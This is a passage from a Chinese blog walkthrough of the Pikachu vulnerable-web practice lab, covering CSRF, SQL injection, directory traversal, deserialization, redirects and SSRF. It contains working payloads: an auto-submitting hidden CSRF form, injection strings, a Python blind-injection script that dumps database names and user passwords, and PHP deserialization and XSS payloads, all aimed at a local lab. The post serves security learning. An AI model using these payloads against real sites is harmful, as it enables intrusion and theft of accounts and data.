</span>PHPSESSID=tsocr2tb2jn5u7guhnipjckg93<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><span class="hljs-attribute">Sec-Fetch-Dest</span><span class="hljs-punctuation">: </span>document<br><span class="hljs-attribute">Sec-Fetch-Mode</span><span class="hljs-punctuation">: </span>navigate<br><span class="hljs-attribute">Sec-Fetch-Site</span><span class="hljs-punctuation">: </span>same-origin<br><span class="hljs-attribute">Sec-Fetch-User</span><span class="hljs-punctuation">: </span>?1<br></code></pre></td></tr></table></figure>

<p>可以看到URL上包含有要修改的信息</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dts">GET <span class="hljs-keyword">/pikachu/</span>vul<span class="hljs-keyword">/csrf/</span>csrfget/csrf_get_edit.php?<span class="hljs-attr">sex</span><span class="hljs-operator">=</span>sex<span class="hljs-variable">&amp;phonenum</span>=phone<span class="hljs-variable">&amp;add</span>=adress<span class="hljs-variable">&amp;email</span>=email<span class="hljs-variable">&amp;submit</span>=submit HTTP/<span class="hljs-number">1.1</span><br></code></pre></td></tr></table></figure>

<p>现在数据包未发出，尝试访问这个URL:</p>
<p><img src="/../images/image-20231220161703905.png" srcset="/img/loading.gif" lazyload alt="image-20231220161703905"></p>
<p>可以看到信息成功被修改,这样就可以断定后端在对信息修改的时候没有做严格的身份验证:</p>
<p>我们尝试登录另一个账号allen</p>
<p><img src="/../images/image-20231220161916886.png" srcset="/img/loading.gif" lazyload alt="image-20231220161916886"></p>
<p>然后构造一个修改信息的链接</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span><span class="hljs-keyword">/pikachu/</span>vul<span class="hljs-keyword">/csrf/</span>csrfget/csrf_get_edit.php?<span class="hljs-attr">sex</span><span class="hljs-operator">=</span>sex<span class="hljs-variable">&amp;phonenum</span>=phone<span class="hljs-variable">&amp;add</span>=adress<span class="hljs-variable">&amp;email</span>=email<span class="hljs-variable">&amp;submit</span>=submit<br></code></pre></td></tr></table></figure>

<p>这个时候allen在登录的状态下访问了该链接</p>
<p><img src="/../images/image-20231220162410538.png" srcset="/img/loading.gif" lazyload alt="image-20231220162410538"></p>
<p>发现allen成功修改了自己的信息</p>
<p>看一下源码:</p>
<p><img src="/../images/image-20231220163418767.png" srcset="/img/loading.gif" lazyload alt="image-20231220163418767"></p>
<p>可以看到修改信息的部分只是简单的判断了是否在登录状态并没有判断访问来源或者别的验证</p>
<p>在实战中攻击者会通过伪装该链接来骗取目标去点击</p>
<p>可以通过该网站:<a target="_blank" rel="noopener" href="https://wsc.fit/">在线短链生成器 </a></p>
<p><img src="/../images/image-20231220162947673.png" srcset="/img/loading.gif" lazyload alt="image-20231220162947673"></p>
<p>这样目标就难以看出真实链接的目的了</p>
<h4 id="post"><a href="#post" class="headerlink" title="post"></a><strong>post</strong></h4><p><img src="/../images/image-20231220174445622.png" srcset="/img/loading.gif" lazyload alt="image-20231220174445622"></p>
<p>本关源码没什么变化只是把传参形式改成post传参而已，还是可以伪造一个链接去诱骗目标</p>
<p>攻击者主要通过将传参形式改写成post形式再写成一个文件放到自己的一个服务器上让目标来访问该文件时发送数据包</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-handlebars"><span class="language-xml">                                                                                                       <span class="hljs-comment">&lt;!-- 这个script是用来自动提交表单的 --&gt;</span></span></span><br><span class="language-xml"><span class="language-handlebars">        window.onload = function() &#123;</span></span><br><span class="language-xml"><span class="language-handlebars">        document.getElementById(&quot;submit&quot;).click();</span></span><br><span class="language-xml"><span class="language-handlebars">        &#125;</span></span><br><span class="language-xml"><span class="language-handlebars">    </span></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>              <br>    <span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br>            <span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">&quot;http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php&quot;</span> <span class="hljs-attr">method</span>=<span class="hljs-string">&quot;POST&quot;</span>&gt;</span>    <br>                <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;sex&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;girl&quot;</span> /&gt;</span><br>                <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;phonenum&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;hack&quot;</span> /&gt;</span><br>                <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;add&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;usa&quot;</span> /&gt;</span><br>                <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;email&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;xiannv@pikachu.com&quot;</span> /&gt;</span><br>                <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;submit&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;submit&quot;</span> /&gt;</span><br>	            <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">id</span>=<span class="hljs-string">&quot;submit&quot;</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;submit&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;Submit request&quot;</span> <span class="hljs-attr">style</span>=<span class="hljs-string">&quot;display:none&quot;</span>/&gt;</span>                    <span class="hljs-comment">&lt;!-- style设置为display:none起到隐藏submit按钮的作用 --&gt;</span><br>            <span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span> <br></code></pre></td></tr></table></figure>

<p>再放入服务器中，假设文件路径就是:</p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">127.0.0.1</span>/pikachu/vul/csrf/csrfpost/html<br></code></pre></td></tr></table></figure>

<p>目标访问链接后自动发送数据包实现攻击</p>
<p><img src="/../images/image-20231220175051970.png" srcset="/img/loading.gif" lazyload alt="image-20231220175051970"></p>
<h4 id="token"><a href="#token" class="headerlink" title="token"></a><strong>token</strong></h4><p><img src="/../images/image-20231220175229313.png" srcset="/img/loading.gif" lazyload alt="image-20231220175229313"></p>
<h3 id="SQL"><a href="#SQL" class="headerlink" title=".SQL"></a>.SQL</h3><h4 id="数字型"><a href="#数字型" class="headerlink" title="数字型"></a><strong>数字型</strong></h4><p>用户通过提交一个数字参数给后台，后台用该数字在数据库中查询。如果没有作严格的过滤就会被攻击者通过拼接sql语句实现其他操作</p>
<p><img src="/../images/image-20231220221023494.png" srcset="/img/loading.gif" lazyload alt="image-20231220221023494"></p>
<p>尝试拼接逻辑语句判断时候在true和false时的状态来判断时否存在注入漏洞</p>
<p><img src="/../images/image-20231220221207664.png" srcset="/img/loading.gif" lazyload alt="image-20231220221207664"></p>
<p>当bool值为false时查询不到结果</p>
<p><img src="/../images/image-20231220221255898.png" srcset="/img/loading.gif" lazyload alt="image-20231220221255898"></p>
<p>ture时正常说明存在注入漏洞</p>
<p><img src="/../images/image-20231220221412490.png" srcset="/img/loading.gif" lazyload alt="image-20231220221412490"></p>
<h4 id="字符型"><a href="#字符型" class="headerlink" title="字符型"></a><strong>字符型</strong></h4><p>在数据库的查询语句中若要查询字符就要用引号来</p>
<p><img src="/../images/image-20231220221627954.png" srcset="/img/loading.gif" lazyload alt="image-20231220221627954"></p>
<p>所在要闭合就要加多引号</p>
<p><img src="/../images/image-20231220221938123.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="搜索型"><a href="#搜索型" class="headerlink" title="搜索型"></a><strong>搜索型</strong></h4><p>搜素型实现的功能就是对用户输入的内容在数据库中搜索并返回给用户，但用户输入的关键词往往不全，在后台的数据库中就不能搜索到相关内容，于是就要使用**%**通配符来实现模糊匹配.这样才能搜索到相关的内容</p>
<p><img src="/../images/image-20231220215319810.png" srcset="/img/loading.gif" lazyload alt="image-20231220215319810"></p>
<p>了解基本功能看关卡</p>
<p><img src="/../images/image-20231220215453195.png" srcset="/img/loading.gif" lazyload alt="image-20231220215453195"></p>
<p>随便输入s</p>
<p><img src="/../images/image-20231220215528642.png" srcset="/img/loading.gif" lazyload alt="image-20231220215528642"></p>
<p>尝试闭合</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">%&#x27; <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/image-20231220220558225.png" srcset="/img/loading.gif" lazyload alt="image-20231220220558225"></p>
<p><img src="/../images/image-20231220220629940.png" srcset="/img/loading.gif" lazyload alt="image-20231220220629940"></p>
<p>说明存在搜索型注入</p>
<p>之后就是利用就行了</p>
<h4 id="insert-updatae"><a href="#insert-updatae" class="headerlink" title="insert&#x2F;updatae"></a>insert&#x2F;updatae</h4><p>往往账户注册或者修改信息都会将信息写入到后台数据库中使用的语句</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">insert</span> into 表名（字段名<span class="hljs-number">1</span>，字段名<span class="hljs-number">2</span>）values（值<span class="hljs-number">1</span>，值<span class="hljs-number">2</span>）;<br></code></pre></td></tr></table></figure>

<p>值1&#x2F;2是用户输入变量，通常是字符所以要用引号，而在语句使用时没有对用户输入的进行转义，攻击者就可以利用特殊字符来闭合语句实现其他操作</p>
<p><img src="/../images/image-20231220224609709.png" srcset="/img/loading.gif" lazyload alt="image-20231220224609709"></p>
<p>查看后端代码</p>
<p><img src="/../images/image-20231220224635544.png" srcset="/img/loading.gif" lazyload alt="image-20231220224635544"></p>
<p>这里就可以使用单引号闭合前面，但是处于insert语句的语法，后面的语句不能直接注释，所以要用or来实现插入</p>
<p>‘ or updatexml(1,concat(0x7e,database()),0) or ‘</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs"><br></code></pre></td></tr></table></figure>

<p>前后的引号就闭合前后的引号</p>
<p><img src="/../images/image-20231220224923024.png" srcset="/img/loading.gif" lazyload alt="image-20231220224923024"></p>
<h4 id="delete"><a href="#delete" class="headerlink" title="delete"></a>delete</h4><p>数据库删除字段的语法:</p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs n1ql"><span class="hljs-keyword">delete</span> <span class="hljs-keyword">from</span> 表名 <span class="hljs-keyword">where</span> 条件;<br></code></pre></td></tr></table></figure>

<p>用户输入在条件处，所以条件处可控</p>
<p><img src="/../images/image-20231221144716137.png" srcset="/img/loading.gif" lazyload alt="image-20231221144716137"></p>
<p>尝试输入注入是无效的，抓包删除键</p>
<p><img src="/../images/image-20231221144703240.png" srcset="/img/loading.gif" lazyload alt="image-20231221144703240"></p>
<p>发现参数id,猜测可能是利用id来定位要删除的对象，id为数字型尝试数字型注入</p>
<p><img src="/../images/image-20231221145139066.png" srcset="/img/loading.gif" lazyload alt="image-20231221145139066"></p>
<p>成功删除，后面查询会报错就用报错注入</p>
<p><img src="/../images/image-20231221145221992.png" srcset="/img/loading.gif" lazyload alt="image-20231221145221992"></p>
<p>查看源码</p>
<p><img src="/../images/image-20231221145257145.png" srcset="/img/loading.gif" lazyload alt="image-20231221145257145"></p>
<p>发现只对输入的内容进行了转义但是没有对删除的id进行转义</p>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>bool盲注就是查询的结果不会直接显示出只能靠一个一个的猜，利用回显的值来判断猜测正确与否。</p>
<p>利用脚本跑出来</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> time<br>header = &#123;<br>    <span class="hljs-string">&#x27;Host&#x27;</span>:<span class="hljs-string">&#x27;da41ba10-3ba9-4cfb-9326-e6f5276e4315.challenge.ctf.show&#x27;</span>,<br>    <span class="hljs-string">&#x27;User-Agent&#x27;</span>:<span class="hljs-string">&#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0&#x27;</span>,<br>    <span class="hljs-string">&#x27;Accept&#x27;</span>:<span class="hljs-string">&#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8&#x27;</span>,<br>    <span class="hljs-string">&#x27;Accept-Language&#x27;</span>:<span class="hljs-string">&#x27;zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2&#x27;</span>,<br>    <span class="hljs-string">&#x27;Accept-Encoding&#x27;</span>:<span class="hljs-string">&#x27;gzip, deflate&#x27;</span>,<br>    <span class="hljs-string">&#x27;Content-Type&#x27;</span>:<span class="hljs-string">&#x27;application/x-www-form-urlencoded&#x27;</span><br>&#125;  <span class="hljs-comment">#伪装头</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">find_number</span>(<span class="hljs-params">cd</span>):   <span class="hljs-comment">#判断数据库长度</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">50</span>):<br>        payload = <span class="hljs-string">&quot;\&#x27; and length((select database()))=%d--+&quot;</span><br>        <span class="hljs-comment">#payload = &quot; and length((select database())=%d--+&quot;</span><br>        T1=time.time()<br>        res = requests.get(url=url+payload%i+<span class="hljs-string">&#x27;&amp;submit=%E6%9F%A5%E8%AF%A2&#x27;</span>)<br>        T2=time.time()<br>        <span class="hljs-comment">#if(T2-T1&gt;=3):</span><br>        <span class="hljs-keyword">if</span>(cd <span class="hljs-keyword">in</span> res.text):<br>           <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;数据库长度为：&quot;</span>,i)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">find_all</span>(<span class="hljs-params">cd,payload</span>):<br>    name = <span class="hljs-string">&quot;&quot;</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">35</span>):<br>        <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">31</span>, <span class="hljs-number">128</span>):<br>            T1 = time.time()<br>            res = requests.post(url=url+payload%(i,j)+<span class="hljs-string">&#x27;&amp;submit=%E6%9F%A5%E8%AF%A2&#x27;</span>,headers=header)<br>            T2 = time.time()<br>            <span class="hljs-keyword">if</span>(cd <span class="hljs-keyword">in</span> res.text):<br>            <span class="hljs-comment">#if(T2-T1&gt;=2):</span><br>                name += <span class="hljs-built_in">chr</span>(j)<br>                <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;所得值为: %s&#x27;</span> % name)<br>                <span class="hljs-keyword">break</span><br>url=<span class="hljs-string">&quot;http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=kobe&quot;</span><br><span class="hljs-comment">#库名:</span><br>payload = <span class="hljs-string">&quot;\&#x27; and ascii(substr(database() from %d for 1))=%d--+&quot;</span><br><span class="hljs-comment">#表名:</span><br><span class="hljs-comment">#payload=&quot;/**/and/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d--+&quot;</span><br><span class="hljs-comment">#列名:</span><br><span class="hljs-comment">#payload = &quot;/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=&#x27;users&#x27;)from/**/%d/**/for/**/1))=%d),sleep(2),1)--+&quot;</span><br><span class="hljs-comment">#值:</span><br><span class="hljs-comment">#payload = &quot;/**/or/**/and/**/ascii(substr((select/**/group_concat(id,username,password)/**/from/**/users)from/**/%d/**/for/**/1))=%d--+&quot;</span><br><br>condition=<span class="hljs-string">&quot;your uid&quot;</span><span class="hljs-comment">#返回条件</span><br>find_number(condition)<span class="hljs-comment">#爆数据库长度</span><br>find_all(condition,payload)<span class="hljs-comment">#爆名</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/image-20231221150823109.png" srcset="/img/loading.gif" lazyload alt="image-20231221150823109"></p>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a><strong>时间盲注</strong></h4><p>时间盲注就连回显都没有，只能靠操控时间的长短来判断猜测正确与否</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">payload</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;kobe&#x27; and if(length(database())=%d,sleep(5),0)&quot;</span><br></code></pre></td></tr></table></figure>

<p>如果返回为真就延时5秒，就靠着延时来判断出正确的长度或者别的内容</p>
<p><img src="/../images/image-20231221154114417.png" srcset="/img/loading.gif" lazyload alt="image-20231221154114417"></p>
<h3 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h3><p><img src="/../images/image-20231221154824012.png" srcset="/img/loading.gif" lazyload alt="image-20231221154824012"></p>
<p>注意到参数，点击两个都对传入两个不同的文件名，显示也是不同的文件内容。猜测存在目录遍历查看源码</p>
<p><img src="/../images/image-20231221155050249.png" srcset="/img/loading.gif" lazyload alt="image-20231221155050249"></p>
<p>可以看到，对传入的title参数没有做任何过滤直接使用require进行文件包含</p>
<p><strong><code>require</code> 函数与 <code>include</code> 函数类似</strong>，但它们之间一些重要的区别：</p>
<ul>
<li><code>require</code> 函数会在引入文件之前检查文件是否存在，如果文件不存在，则会导致致命错误并停止脚本的执行。而 <code>include</code> 函数只会发出警告并继续执行脚本。</li>
<li><code>require</code> 函数引入的文件必须是有效的 PHP 代码，否则会导致语法错误并停止脚本的执行。而 <code>include</code> 函数只会发出警告并继续执行脚本。</li>
</ul>
<p>利用..&#x2F;回到上一个目录</p>
<p><img src="/../images/image-20231221155427857.png" srcset="/img/loading.gif" lazyload alt="image-20231221155427857"></p>
<h3 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h3><p>信息泄露是指后台管理员在文件储存的时候由于不严格的限制用户访问位置导致一些敏感的文件可以被用户访问到</p>
<p><img src="/../images/image-20231221155910766.png" srcset="/img/loading.gif" lazyload alt="image-20231221155910766"></p>
<p>卡到文件意思是要找到abc文件，一开始在不知道的情况下是可以铜鼓哦利用工具来对目录进行扫描</p>
<p><img src="/../images/image-20231221160005547.png" srcset="/img/loading.gif" lazyload alt="image-20231221160005547"></p>
<p>可以看到扫出有abc文件。</p>
<p>文件扫描是主动扫描，在实战中，如果使用批量的扫描容易被发现，了解一些关于框架的一些配置文件可以通过尝试访问看看是否存在敏感信息.如phpinfo.php为php环境的配置信息或者phpMyAdmin 后台</p>
<h3 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP反序列化"></a>PHP反序列化</h3><p>序列化是php将字符转化为一种字节流的过程,反序列化就是反过来，在序列化或者反序列化过程当中的php语句会被解析，如果被攻击者利用就造成别的操作。</p>
<p><img src="/../images/image-20231221194458137.png" srcset="/img/loading.gif" lazyload alt="image-20231221194458137"></p>
<p>本关直接给一个可以序列化的接口，如果往里面写入带有恶意代码的序列化后的语句可以会被执行</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">O</span>:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;a&quot;</span>:<span class="hljs-number">1</span>:&#123;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;as&quot;</span>;s:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;system(&#x27;dir&#x27;)&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<p>无果</p>
<p>查看源代码</p>
<p><img src="/../images/image-20231221200105698.png" srcset="/img/loading.gif" lazyload alt="image-20231221200105698"></p>
<p>可以看到是直接反序列化还把结果通过html展示出来，这就存在xss但是这好像是要知道属性名为test才行(有点..)</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">O</span>:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;S&quot;</span>:<span class="hljs-number">1</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;test&quot;</span>;s:<span class="hljs-number">29</span>:<span class="hljs-string">&quot;&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<p><img src="/../images/image-20231221200344859.png" srcset="/img/loading.gif" lazyload alt="image-20231221200344859"></p>
<h3 id="重定向"><a href="#重定向" class="headerlink" title="重定向"></a>重定向</h3><p><img src="/../images/image-20231221205135240.png" srcset="/img/loading.gif" lazyload alt="image-20231221205135240"></p>
<p>查看按钮执行的语句，发现传入一个url参数，参数值为一个文件，而且点击后是直接跳转到指定的文件出。猜测是否存在跟目录遍历类似的漏洞’</p>
<p>尝试访问上一个目录提前创好的a.txt文件</p>
<p><img src="/../images/image-20231221205339285.png" srcset="/img/loading.gif" lazyload alt="image-20231221205339285"></p>
<p>发现访问成功</p>
<p>查看一下源码</p>
<p><img src="/../images/image-20231221205516529.png" srcset="/img/loading.gif" lazyload alt="image-20231221205516529"></p>
<p>可以看到直接将传入的url放入到header重定向函数中，造成任意文件读取</p>
<h3 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h3><p>SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制</p>
<p>导致攻击者去伪造请求让服务器去发起请求，通过目标服务器去访问别的服务器或者是自身的内容</p>
<p>有点类似于CSRF但是这是服务器去请求。如果没有进行严格的过滤就有可能造成:</p>
<ul>
<li>对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息。</li>
<li>攻击运行在内网或本地的应用程序。</li>
<li>对内网Web应用进行指纹识别，识别企业内部的资产信息。</li>
<li>攻击内外网的Web应用，主要是使用HTTP GET请求就可以实现的攻击(比如struts2、SQli等)。</li>
<li>利用file协议读取本地文件等。</li>
</ul>
<p><img src="/../images/image-20231221212537730.png" srcset="/img/loading.gif" lazyload alt="image-20231221212537730"></p>
<p>尝试更换访问的URL</p>
<p><img src="/../images/image-20231221212613993.png" srcset="/img/loading.gif" lazyload alt="image-20231221212613993"></p>
<p>可以发现服务器任意发送请求</p>
<p>这三个函数在PHP中用于从远程服务器获取数据或与远程服务器通信。</p>
<ol>
<li><p><code>file_get_contents()</code>: 这个函数用于将整个文件读入一个字符串中。它可以用来获取远程服务器上的文件内容，例如网页内容或 API 响应。使用该函数时需要确保 PHP 配置中允许打开远程文件。</p>
</li>
<li><p><code>fsockopen()</code>: 这个函数用于在网络上打开一个 socket 连接。它可以用于通过 TCP 或 UDP 与远程服务器进行通信。通过这个函数，你可以手动构建和发送 HTTP 请求，以及处理服务器响应。</p>
</li>
<li><p><code>curl_exec()</code>: 这个函数是通过 cURL 库执行一个请求，并返回结果。cURL 是一个功能强大的工具，用于在不同协议下传输数据。<code>curl_exec()</code> 可以用来向服务器发送请求并获取响应，支持的协议包括 HTTP、HTTPS、FTP 等。</p>
</li>
</ol>
<p>这些函数都可以用于从远程服务器获取数据或与远程服务器进行通信，但各自的使用场景和功能略有不同。</p>
<p>1.验证是否存在可以通过跳转链接处的源码或者是否存在参数，如果有就可以存在SSRF</p>
<p>2.抓包看参数是否包含有别的服务器url</p>
<p>3.尝试让服务器访问dnslog，如有数据就存在SSRF</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>pikachu与upload练习</div>
      <div>http://example.com/2023/12/04/pikachu与upload-lab靶场练习/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年12月4日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/12/17/arp%E6%AC%BA%E9%AA%97/" title="arp欺骗">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">arp欺骗</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/12/04/tcp%E6%B5%81%E9%87%8F%E6%8A%A5%E6%96%87%E5%88%86%E6%9E%90/" title="tcp流量报文分析">
                        <span class="hidden-mobile">tcp流量报文分析</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
